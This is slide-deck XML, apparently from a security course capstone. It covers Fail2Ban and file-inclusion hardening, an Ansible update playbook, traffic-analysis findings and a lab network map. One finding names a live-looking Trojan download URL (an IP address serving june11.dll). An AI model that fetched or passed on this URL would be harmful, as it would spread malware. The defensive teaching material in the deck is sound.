            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2562" name="Google Shape;2562;p16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2 against Directory Exploration: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 number of tools have been designed to act based on the log activity.  For example one that is used is Fail2Ban, this tool can be configured to temporarily ban a remote IP address with firewall rules.</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 </a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This configuration temporarily bans IP addresses with firewall rules if it generates too many 404s within a time period. </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install it: </a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">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apt-get update &amp;&amp; apt-get upgrade -y (ensure system is up to date)</a:t>
            </a:r>
            <a:endParaRPr sz="400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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apt-get install fail2ban (Install Fail2ban)</a:t>
            </a:r>
            <a:endParaRPr sz="4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16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Hardening Against LFI on Target 2</a:t>
            </a:r>
            <a:endParaRPr sz="5900" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2568" name="Google Shape;2568;p16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26</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2569" name="Google Shape;2569;p16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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to patch Target 2 against Local File Inclusion:</a:t>
            </a:r>
            <a:endParaRPr sz="44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To safely analyze user-supplied filenames, it is more efficient to create a whitelist of acceptable filenames and use a corresponding identifier, without using actual names, to access the file.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why the patch works:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">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rgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>User input is any data that is processed by the application and can be entered or manipulated by application users.</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install it:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">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iptables -A INPUT -s 192.168.1.90 -p tcp --dport 80 -i eht0 -j DROP</a:t>
            </a:r>
            <a:endParaRPr sz="4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pic>
        <p:nvPicPr>
          <p:cNvPr id="2574" name="Google Shape;2574;p167"/>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575" name="Google Shape;2575;p167"/>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576" name="Google Shape;2576;p16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27</a:t>
            </a:fld>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16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Implementing Patches with Ansible</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2582" name="Google Shape;2582;p16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28</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2583" name="Google Shape;2583;p16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Playbook Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One could utilize ansible and a cron job to automate system wide updates as well as keep necessary tools up to date. Ansible can also be used to verify system health (ie. ensuring web servers are up and running)</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>---</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- name: Update apt-get repo and cache</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  hosts: webservers</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  apt: update_cache=yes force_apt_get=yes cache_valid_time=3600</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - name: Check if reboot is required</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - register: reboot_required_file</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - stat: path=/var/run/reboot-required get_md5=no</a:t>
            </a:r>
            <a:endParaRPr sz="4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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2628" name="Google Shape;2628;p174"/>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Malicious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629" name="Google Shape;2629;p17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29</a:t>
            </a:fld>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2356" name="Google Shape;2356;p13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57" name="Google Shape;2357;p13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
        <p:nvSpPr>
          <p:cNvPr id="2358" name="Google Shape;2358;p139"/>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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Critical Vulnerabilities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59" name="Google Shape;2359;p139"/>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17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Illegal Downloads </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2636" name="Google Shape;2636;p17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30</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2637" name="Google Shape;2637;p175"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-33" y="2028442"/>
            <a:ext cx="24377700" cy="96591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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocol Observed:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1"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HTTP</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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traffic Analyzed:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User downloaded a Trojan from http://205.185.125.104/files/june11.dll</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Possibly Interesting Files:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>june11.dll </a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8F08030-13C0-429C-AB45-B85DF88F9D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5099538" y="6325762"/>
            <a:ext cx="11875233" cy="64406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sp>
        <p:nvSpPr>
          <p:cNvPr id="2644" name="Google Shape;2644;p17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Illegal Downloads </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2645" name="Google Shape;2645;p17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31</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2646" name="Google Shape;2646;p176"/>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647" name="Google Shape;2647;p176"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-33" y="2028442"/>
            <a:ext cx="24377700" cy="9659100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocol Observed:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>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Traffic Analyzed:</a:t>
            </a:r>
            <a:endParaRPr sz="44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User was browsing publicdomaintorrents.com and downloaded a torrent. </a:t>
            </a:r>
            <a:endParaRPr sz="40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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Possibly Interesting Files:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Betty_Boop_Rhythm_on_the_Reservation.avi.torrent</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2648" name="Google Shape;2648;p176"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703075" y="8026050"/>
            <a:ext cx="22971351" cy="25276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177"/>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The End</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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654" name="Google Shape;2654;p17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32</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40"/>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600">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="2600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Address Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Gateway: 192.168.1.1</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600">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="26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sz="2400"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>OS: Debian Kali 5.4.0</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hostname: Kali</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192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>OS: Debian GNU/Linux 8</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hostname: Target 1</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192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>OS: Debian GNU/Linux 8</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hostname: Target 2</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t>IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>OS: Ubuntu 18.04</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hostname: Capstone</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: Ubuntu 18.04</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: ELK</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2365" name="Google Shape;2365;p140"/>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66" name="Google Shape;2366;p140"/>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67" name="Google Shape;2367;p140"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="307575" y="2427925"/>
